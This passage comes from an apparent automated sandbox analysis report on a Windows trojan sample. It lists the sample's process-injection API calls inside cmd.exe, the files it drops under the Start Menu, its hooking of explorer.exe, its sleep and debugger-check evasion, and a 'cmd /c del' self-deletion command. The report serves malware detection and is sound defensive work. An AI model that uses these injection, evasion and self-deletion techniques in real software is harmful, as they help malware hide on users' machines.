      Source: C:\Windows\SysWOW64\cmd.exe | Code function: 15_2_00D8C1FA SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memcpy,memcpy,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW
      Source: C:\Windows\SysWOW64\cmd.exe | Code function: 15_2_00D76500 NtQueryInformationToken,NtQueryInformationToken
      Source: C:\Windows\SysWOW64\cmd.exe | Code function: 15_2_00D8A135 NtSetInformationFile
      Source: C:\Windows\SysWOW64\cmd.exe | Code function: 15_2_00D64E3B _setjmp3,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,longjmp
      Source: C:\Windows\SysWOW64\cmd.exe | Code function: 15_2_00D74759 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,DeleteFileW,GetLastError
      Source: C:\Windows\SysWOW64\cmd.exe | Code function: 15_2_03B234E0 NtCreateMutant,LdrInitializeThunk
      Source: C:\Windows\SysWOW64\cmd.exe | Code function: 15_2_03B22B90 NtFreeVirtualMemory,LdrInitializeThunk
      Source: C:\Windows\SysWOW64\cmd.exe | Code function: 15_2_03B22B80 NtCreateKey,LdrInitializeThunk
      Source: C:\Windows\SysWOW64\cmd.exe | Code function: 15_2_03B22BC0 NtQueryInformationToken,LdrInitializeThunk
      Source: C:\Windows\SysWOW64\cmd.exe | Code function: 15_2_03B22A80 NtClose,LdrInitializeThunk
      Source: C:\Windows\SysWOW64\cmd.exe | Code function: 15_2_03B229F0 NtReadFile,LdrInitializeThunk
      Source: C:\Windows\SysWOW64\cmd.exe | Code function: 15_2_03B22F00 NtCreateFile,LdrInitializeThunk
      Source: C:\Windows\SysWOW64\cmd.exe | Code function: 15_2_03B22E50 NtCreateSection,LdrInitializeThunk
      Source: C:\Windows\SysWOW64\cmd.exe | Code function: 15_2_03B22DC0 NtAdjustPrivilegesToken,LdrInitializeThunk
      Source: C:\Windows\SysWOW64\cmd.exe | Code function: 15_2_03B22D10 NtQuerySystemInformation,LdrInitializeThunk
      Source: C:\Windows\SysWOW64\cmd.exe | Code function: 15_2_03B22CF0 NtDelayExecution,LdrInitializeThunk
      Source: C:\Windows\SysWOW64\cmd.exe | Code function: 15_2_03B22C30 NtMapViewOfSection,LdrInitializeThunk
      Source: C:\Windows\SysWOW64\cmd.exe | Code function: 15_2_03B24260 NtSetContextThread
      Source: C:\Windows\SysWOW64\cmd.exe | Code function: 15_2_03B24570 NtSuspendThread
      Source: C:\Windows\SysWOW64\cmd.exe | Code function: 15_2_03B22BE0 NtQueryVirtualMemory
      Source: C:\Windows\SysWOW64\cmd.exe | Code function: 15_2_03B22B20 NtQueryInformationProcess
      Source: C:\Windows\SysWOW64\cmd.exe | Code function: 15_2_03B22B10 NtAllocateVirtualMemory
      Source: C:\Windows\SysWOW64\cmd.exe | Code function: 15_2_03B22B00 NtQueryValueKey
      Source: C:\Windows\SysWOW64\cmd.exe | Code function: 15_2_03B22AA0 NtQueryInformationFile
      Source: C:\Windows\SysWOW64\cmd.exe | Code function: 15_2_03B22AC0 NtEnumerateValueKey
      Source: C:\Windows\SysWOW64\cmd.exe | Code function: 15_2_03B22A10 NtWriteFile
      Source: C:\Windows\SysWOW64\cmd.exe | Code function: 15_2_03B229D0 NtWaitForSingleObject
      Source: C:\Windows\SysWOW64\cmd.exe | Code function: 15_2_03B238D0 NtGetContextThread
      Source: C:\Windows\SysWOW64\cmd.exe | Code function: 15_2_03B22FB0 NtSetValueKey
      Source: C:\Windows\SysWOW64\cmd.exe | Code function: 15_2_03B22F30 NtOpenDirectoryObject
      Source: C:\Windows\SysWOW64\cmd.exe | Code function: 15_2_03B22EB0 NtProtectVirtualMemory
      Source: C:\Windows\SysWOW64\cmd.exe | Code function: 15_2_03B22E80 NtCreateProcessEx
      Source: C:\Windows\SysWOW64\cmd.exe | Code function: 15_2_03B22ED0 NtResumeThread
      Source: C:\Windows\SysWOW64\cmd.exe | Code function: 15_2_03B22EC0 NtQuerySection
      Source: C:\Windows\SysWOW64\cmd.exe | Code function: 15_2_03B22E00 NtQueueApcThread
      Source: C:\Windows\SysWOW64\cmd.exe | Code function: 15_2_03B22DA0 NtReadVirtualMemory
      Source: C:\Windows\SysWOW64\cmd.exe | Code function: 15_2_03B22D50 NtWriteVirtualMemory
      Source: C:\Windows\SysWOW64\cmd.exe | Code function: 15_2_03B23C90 NtOpenThread
      Source: C:\Windows\SysWOW64\cmd.exe | Code function: 15_2_03B22CD0 NtEnumerateKey
      Source: C:\Windows\SysWOW64\cmd.exe | Code function: 15_2_03B23C30 NtOpenProcessToken
      Source: C:\Windows\SysWOW64\cmd.exe | Code function: 15_2_03B22C20 NtSetInformationFile
      Source: C:\Windows\SysWOW64\cmd.exe | Code function: 15_2_03B22C10 NtOpenProcess
      Source: C:\Windows\SysWOW64\cmd.exe | Code function: 15_2_03B22C50 NtUnmapViewOfSection
      Source: C:\Windows\SysWOW64\cmd.exe | Code function: 15_2_02DEA360 NtCreateFile
      Source: C:\Windows\SysWOW64\cmd.exe | Code function: 15_2_02DEA490 NtClose
      Source: C:\Windows\SysWOW64\cmd.exe | Code function: 15_2_02DEA410 NtReadFile
      Source: C:\Windows\SysWOW64\cmd.exe | Code function: 15_2_02DEA48A NtClose
      Source: C:\Windows\SysWOW64\cmd.exe | Code function: 15_2_00D64C10: memset,GetFileSecurityW,GetSecurityDescriptorOwner,??_V@YAXPAX@Z,memset,CreateFileW,DeviceIoControl,memcpy,CloseHandle,??_V@YAXPAX@Z,memset,??_V@YAXPAX@Z,FindClose,??_V@YAXPAX@Z
      Source: jU0hAXFL0k.exe, 00000005.00000000.2063367324657.000000000043A000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameeskatologiskes outsubtle.exe4 vs jU0hAXFL0k.exe
      Source: C:\Users\user\Desktop\jU0hAXFL0k.exe | Section loaded: edgegdi.dll
      Source: C:\Users\user\Desktop\jU0hAXFL0k.exe | Section loaded: edgegdi.dll
      Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: edgegdi.dll
      Source: jU0hAXFL0k.exe | Static PE information: invalid certificate
      Source: jU0hAXFL0k.exe | Virustotal: Detection: 45%
      Source: jU0hAXFL0k.exe | ReversingLabs: Detection: 31%
      Source: C:\Users\user\Desktop\jU0hAXFL0k.exe | File read: C:\Users\user\Desktop\jU0hAXFL0k.exe
      Source: jU0hAXFL0k.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\jU0hAXFL0k.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: unknown | Process created: C:\Users\user\Desktop\jU0hAXFL0k.exe C:\Users\user\Desktop\jU0hAXFL0k.exe
      Source: C:\Users\user\Desktop\jU0hAXFL0k.exe | Process created: C:\Users\user\Desktop\jU0hAXFL0k.exe C:\Users\user\Desktop\jU0hAXFL0k.exe
      Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\autofmt.exe C:\Windows\SysWOW64\autofmt.exe
      Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\jU0hAXFL0k.exe"
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\Desktop\jU0hAXFL0k.exe | Process created: C:\Users\user\Desktop\jU0hAXFL0k.exe C:\Users\user\Desktop\jU0hAXFL0k.exe
      Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\autofmt.exe C:\Windows\SysWOW64\autofmt.exe
      Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\jU0hAXFL0k.exe"
      Source: C:\Users\user\Desktop\jU0hAXFL0k.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
      Source: C:\Users\user\Desktop\jU0hAXFL0k.exe | Code function: 5_2_00403235 EntryPoint,SetErrorMode,GetVersion,lstrlenA,LdrInitializeThunk,#17,OleInitialize,LdrInitializeThunk,SHGetFileInfoA,GetCommandLineA,CharNextA,LdrInitializeThunk,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,LdrInitializeThunk,CopyFileA,CloseHandle,LdrInitializeThunk,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,LdrInitializeThunk,ExitWindowsEx,ExitProcess
      Source: C:\Users\user\Desktop\jU0hAXFL0k.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens
      Source: C:\Users\user\Desktop\jU0hAXFL0k.exe | File created: C:\Users\user\AppData\Local\Temp\nsm756E.tmp
      Source: classification engine | Classification label: mal100.troj.evad.winEXE@446/13@24/12
      Source: C:\Users\user\Desktop\jU0hAXFL0k.exe | Code function: 5_2_00402138 LdrInitializeThunk,LdrInitializeThunk,CoCreateInstance,MultiByteToWideChar,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk
      Source: C:\Users\user\Desktop\jU0hAXFL0k.exe | File read: C:\Users\desktop.ini
      Source: C:\Users\user\Desktop\jU0hAXFL0k.exe | Code function: 5_2_004044FA GetDlgItem,SetWindowTextA,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,LdrInitializeThunk,GetDiskFreeSpaceA,MulDiv,LdrInitializeThunk,SetDlgItemTextA
      Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6112:120:WilError_03
      Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6112:304:WilStaging_02
      Source: C:\Users\user\Desktop\jU0hAXFL0k.exe | File written: C:\Users\user\AppData\Local\Temp\reinhold.ini
      Source: jU0hAXFL0k.exe | Static file information: File size 1272864 > 1048576
      Source: jU0hAXFL0k.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: mshtml.pdb | source: jU0hAXFL0k.exe, 0000000C.00000001.2063871128101.0000000000649000.00000020.00000001.01000000.00000007.sdmp
      Source: Binary string: wntdll.pdbUGP | source: jU0hAXFL0k.exe, 0000000C.00000003.2064065483562.00000000376E4000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: wntdll.pdb | source: jU0hAXFL0k.exe, 0000000C.00000003.2064065483562.00000000376E4000.00000004.00000020.00020000.00000000.sdmp, cmd.exe
      Source: Binary string: mshtml.pdbUGP | source: jU0hAXFL0k.exe, 0000000C.00000001.2063871128101.0000000000649000.00000020.00000001.01000000.00000007.sdmp
      Source: Binary string: cmd.pdb | source: cmd.exe

      Data Obfuscation

      Source: Yara match | File source: 00000005.00000002.2064063985138.0000000009FD3000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: C:\Users\user\Desktop\jU0hAXFL0k.exe | Code function: 5_2_6FE92F60 push eax; ret 5_2_6FE92F8E
      Source: C:\Windows\SysWOW64\cmd.exe | Code function: 15_2_00D771ED push ecx; ret 15_2_00D77200
      Source: C:\Windows\SysWOW64\cmd.exe | Code function: 15_2_00D7722B push ecx; ret 15_2_00D7723E
      Source: C:\Windows\SysWOW64\cmd.exe | Code function: 15_2_03AE08CD push ecx; mov dword ptr [esp], ecx 15_2_03AE08D6
      Source: C:\Windows\SysWOW64\cmd.exe | Code function: 15_2_02DEEA0F push ss; ret 15_2_02DEEA11
      Source: C:\Windows\SysWOW64\cmd.exe | Code function: 15_2_02DEE0F6 push ss; ret 15_2_02DEE0F7
      Source: C:\Windows\SysWOW64\cmd.exe | Code function: 15_2_02DEA878 push eax; retf 15_2_02DEA87D
      Source: C:\Windows\SysWOW64\cmd.exe | Code function: 15_2_02DEDFE1 push eax; iretd 15_2_02DEDFE2
      Source: C:\Windows\SysWOW64\cmd.exe | Code function: 15_2_02DED4B5 push eax; ret 15_2_02DED508
      Source: C:\Users\user\Desktop\jU0hAXFL0k.exe | Code function: 5_2_6FE91A98 LdrInitializeThunk,GlobalAlloc,LdrInitializeThunk,LdrInitializeThunk,lstrcpyA,lstrcpyA,GlobalFree,LdrInitializeThunk,GlobalFree,GlobalFree,GlobalFree,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,lstrcpyA,LdrInitializeThunk,LdrInitializeThunk,GetModuleHandleA,LdrInitializeThunk,LoadLibraryA,GetProcAddress,lstrlenA
      Source: C:\Users\user\Desktop\jU0hAXFL0k.exe | File created: C:\Users\user\AppData\Local\Temp\nsz7A32.tmp\System.dll
      Source: C:\Users\user\Desktop\jU0hAXFL0k.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens
      Source: C:\Users\user\Desktop\jU0hAXFL0k.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens\Dagtjenesten
      Source: C:\Users\user\Desktop\jU0hAXFL0k.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens\Dagtjenesten\Kwannon
      Source: C:\Users\user\Desktop\jU0hAXFL0k.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens\Dagtjenesten\Kwannon\Dissympathises
      Source: C:\Users\user\Desktop\jU0hAXFL0k.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens\Dagtjenesten\Kwannon\Dissympathises\Reformatting
      Source: C:\Users\user\Desktop\jU0hAXFL0k.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens\Dagtjenesten\Kwannon\Dissympathises\Reformatting\Spongiform.For
      Source: C:\Users\user\Desktop\jU0hAXFL0k.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens\Dagtjenesten\Kwannon\Dissympathises\Reformatting\Megapterine.buc
      Source: C:\Users\user\Desktop\jU0hAXFL0k.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens\Dagtjenesten\Kwannon\Dissympathises\Reformatting\Engroshandlerne.agr
      Source: C:\Users\user\Desktop\jU0hAXFL0k.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens\Dagtjenesten\Kwannon\Dissympathises\Reformatting\haves.ant
      Source: C:\Users\user\Desktop\jU0hAXFL0k.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens\Dagtjenesten\Kwannon\Dissympathises\Reformatting\laggin.tel
      Source: C:\Users\user\Desktop\jU0hAXFL0k.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens\Dagtjenesten\Kwannon\Dissympathises\Reformatting\regneoperatorers.txt
      Source: C:\Users\user\Desktop\jU0hAXFL0k.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens\Unconstraint
      Source: C:\Users\user\Desktop\jU0hAXFL0k.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens\Unconstraint\Opskolingers
      Source: C:\Users\user\Desktop\jU0hAXFL0k.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens\Unconstraint\Opskolingers\unintriguing.tie

      Hooking and other Techniques for Hiding and Protection

      Source: explorer.exe | User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8A 0xAE 0xE5
      Source: C:\Users\user\Desktop\jU0hAXFL0k.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\jU0hAXFL0k.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\jU0hAXFL0k.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
      Source: C:\Windows\explorer.exe TID: 3456 | Thread sleep count: 111 > 30
      Source: C:\Windows\explorer.exe TID: 3456 | Thread sleep time: -222000s >= -30000s
      Source: C:\Windows\explorer.exe TID: 3456 | Thread sleep count: 9864 > 30
      Source: C:\Windows\explorer.exe TID: 3456 | Thread sleep time: -19728000s >= -30000s
      Source: C:\Windows\SysWOW64\cmd.exe TID: 4012 | Thread sleep count: 118 > 30
      Source: C:\Windows\SysWOW64\cmd.exe TID: 4012 | Thread sleep time: -236000s >= -30000s
      Source: C:\Windows\SysWOW64\cmd.exe TID: 4012 | Thread sleep count: 9852 > 30
      Source: C:\Windows\SysWOW64\cmd.exe TID: 4012 | Thread sleep time: -19704000s >= -30000s
      Source: C:\Windows\SysWOW64\cmd.exe | Last function: Thread delayed
      Source: C:\Windows\SysWOW64\cmd.exe | Last function: Thread delayed
      Source: C:\Windows\SysWOW64\cmd.exe | Code function: 15_2_03B21763 rdtsc
      Source: C:\Windows\explorer.exe | Window / User API: threadDelayed 9864
      Source: C:\Windows\explorer.exe | Window / User API: foregroundWindowGot 879
      Source: C:\Windows\explorer.exe | Window / User API: foregroundWindowGot 878
      Source: C:\Windows\SysWOW64\cmd.exe | Window / User API: threadDelayed 9852
      Source: C:\Windows\SysWOW64\cmd.exe | API coverage: 0.8 %
      Source: C:\Windows\SysWOW64\cmd.exe | Process information queried: ProcessInformation
      Source: C:\Users\user\Desktop\jU0hAXFL0k.exe | Code function: 5_2_004062DD FindFirstFileA,FindClose
      Source: C:\Users\user\Desktop\jU0hAXFL0k.exe | Code function: 5_2_004057A2 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,LdrInitializeThunk,FindNextFileA,FindClose
      Source: C:\Users\user\Desktop\jU0hAXFL0k.exe | Code function: 5_2_00402765 FindFirstFileA
      Source: C:\Windows\SysWOW64\cmd.exe | Code function: 15_2_00D7589A FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose
      Source: C:\Windows\SysWOW64\cmd.exe | Code function: 15_2_00D74EC1 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW
      Source: C:\Windows\SysWOW64\cmd.exe | Code function: 15_2_00D83E66 FindFirstFileW,FindNextFileW,FindClose
      Source: C:\Windows\SysWOW64\cmd.exe | Code function: 15_2_00D70207 FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove
      Source: C:\Windows\SysWOW64\cmd.exe | Code function: 15_2_00D6532E GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPAX@Z,FindNextFileW,??_V@YAXPAX@Z,SetLastError,??_V@YAXPAX@Z,GetLastError,FindClose
      Source: C:\Users\user\Desktop\jU0hAXFL0k.exe | API call chain: ExitProcess graph end node | graph_5-4773
      Source: C:\Users\user\Desktop\jU0hAXFL0k.exe | API call chain: ExitProcess graph end node | graph_5-4924
      Source: C:\Windows\SysWOW64\cmd.exe | Code function: 15_2_00D82E37 IsDebuggerPresent
      Source: C:\Users\user\Desktop\jU0hAXFL0k.exe | Code function: 5_2_6FE91A98 LdrInitializeThunk,GlobalAlloc,LdrInitializeThunk,LdrInitializeThunk,lstrcpyA,lstrcpyA,GlobalFree,LdrInitializeThunk,GlobalFree,GlobalFree,GlobalFree,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,lstrcpyA,LdrInitializeThunk,LdrInitializeThunk,GetModuleHandleA,LdrInitializeThunk,LoadLibraryA,GetProcAddress,lstrlenA
      Source: C:\Windows\SysWOW64\cmd.exe | Code function: 15_2_00D6DCD0 GetProcessHeap,HeapAlloc
      Source: C:\Windows\SysWOW64\cmd.exe | Code function: 15_2_03B21763 rdtsc
      Source: C:\Users\user\Desktop\jU0hAXFL0k.exe | Process token adjusted: Debug
      Source: C:\Windows\SysWOW64\cmd.exe | Code function: 15_2_00D8C1FA mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmd.exe | Code function: 15_2_03B5C3B0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmd.exe | Code function: 15_2_03AE93A6 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmd.exe | Code function: 15_2_03AE93A6 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmd.exe | Code function: 15_2_03B0A390 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmd.exe | Code function: 15_2_03B0A390 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmd.exe | Code function: 15_2_03B0A390 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmd.exe | Code function: 15_2_03AE1380 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmd.exe | Code function: 15_2_03AE1380 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmd.exe | Code function: 15_2_03AE1380 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmd.exe | Code function: 15_2_03AE1380 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmd.exe | Code function: 15_2_03AE1380 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmd.exe | Code function: 15_2_03AFF380 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmd.exe | Code function: 15_2_03AFF380 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmd.exe | Code function: 15_2_03AFF380 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmd.exe | Code function: 15_2_03AFF380 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmd.exe | Code function: 15_2_03AFF380 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmd.exe | Code function: 15_2_03AFF380 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmd.exe | Code function: 15_2_03B9F38A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmd.exe | Code function: 15_2_03B133D0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmd.exe | Code function: 15_2_03B143D0 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmd.exe | Code function: 15_2_03B643D5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmd.exe | Code function: 15_2_03AE63CB mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmd.exe | Code function: 15_2_03ADC3C7 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmd.exe | Code function: 15_2_03ADE3C0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmd.exe | Code function: 15_2_03ADE3C0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmd.exe | Code function: 15_2_03ADE3C0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmd.exe | Code function: 15_2_03ADE328 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmd.exe | Code function: 15_2_03ADE328 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmd.exe | Code function: 15_2_03ADE328 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmd.exe | Code function: 15_2_03BB3336 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmd.exe | Code function: 15_2_03B18322 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmd.exe | Code function: 15_2_03B18322 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmd.exe | Code function: 15_2_03B18322 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmd.exe | Code function: 15_2_03B0332D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmd.exe | Code function: 15_2_03AD9303 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmd.exe | Code function: 15_2_03AD9303 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmd.exe | Code function: 15_2_03B1631F mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmd.exe | Code function: 15_2_03B9F30A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmd.exe | Code function: 15_2_03B6330C mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmd.exe | Code function: 15_2_03B6330C mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmd.exe | Code function: 15_2_03B6330C mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmd.exe | Code function: 15_2_03B6330C mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmd.exe | Code function: 15_2_03AFE310 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmd.exe | Code function: 15_2_03AFE310 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmd.exe | Code function: 15_2_03AFE310 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmd.exe | Code function: 15_2_03B5E372 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmd.exe | Code function: 15_2_03B5E372 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmd.exe | Code function: 15_2_03B5E372 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmd.exe | Code function: 15_2_03B5E372 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmd.exe | Code function: 15_2_03B60371 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmd.exe | Code function: 15_2_03B60371 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmd.exe | Code function: 15_2_03B0237A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmd.exe | Code function: 15_2_03AEB360 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmd.exe | Code function: 15_2_03AEB360 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmd.exe | Code function: 15_2_03AEB360 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmd.exe | Code function: 15_2_03AEB360 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmd.exe | Code function: 15_2_03AEB360 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmd.exe | Code function: 15_2_03AEB360 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmd.exe | Code function: 15_2_03B1E363 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmd.exe | Code function: 15_2_03B1E363 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmd.exe | Code function: 15_2_03B1E363 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmd.exe | Code function: 15_2_03B1E363 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmd.exe | Code function: 15_2_03B1E363 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmd.exe | Code function: 15_2_03B1E363 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmd.exe | Code function: 15_2_03B1E363 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmd.exe | Code function: 15_2_03B1E363 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmd.exe | Code function: 15_2_03B1A350 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmd.exe | Code function: 15_2_03AD8347 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmd.exe | Code function: 15_2_03AD8347 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmd.exe | Code function: 15_2_03AD8347 mov eax, dword ptr fs:[00000030h]
